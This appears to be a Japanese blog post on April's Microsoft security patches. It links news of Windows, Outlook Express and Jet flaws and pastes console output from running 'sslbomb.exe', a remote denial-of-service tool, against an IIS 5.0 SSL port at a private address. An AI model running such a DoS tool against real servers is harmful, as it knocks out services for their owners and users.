4月分の月刊MS関連
そんなアドミソ様を打ち砕くツールも即座にリリース。(微妙にコメントに呼応)
IIS5.0のSSL環境が無かったのですがこんな感じでSSLが使えなくなる模様。
C:\temp>sslbomb.exe 192.168.1.15 443 <*> S21sec Microsoft IIS 5.0 SSL/TLS Remote DoS <*> -> Connecting to 192.168.1.15:443... OK -> Sending SSL Client Hello... OK -> Waiting for SSL Server Hello... OK -> Sending bomb... B00M!! B00M!! B00M!! B00M!! B00M!! B00M!! -> -> OK. If DoS has been worked you will not be able to negotiate SSL with 192.168.1.15:443
- ネットワークに接続しているだけで任意のコードを実行可能な脆弱性(INTERNETWatch)
- 任意コードの実行が可能な脆弱性を含むOutlook Express用累積的パッチ(INTERNETWatch)
- Microsoft Jetデータベースエンジンにバッファオーバーランの脆弱性(INTERNETWatch)
- Windowsに複数の危険なセキュリティ・ホール,“超特大”も含まれる(ITpro)
- Outlook Expressに「緊急」のセキュリティ・ホール,すぐにパッチの適用を(ITpro)
- 【今週のSecurity Check】パッチ未公開のセキュリティ・ホールにも対応,最新版「IEを使い続けるための“お勧め”設定」(ITPro)
追記:
イベントID 5000でエラーが残る模様。詳細は未チェック。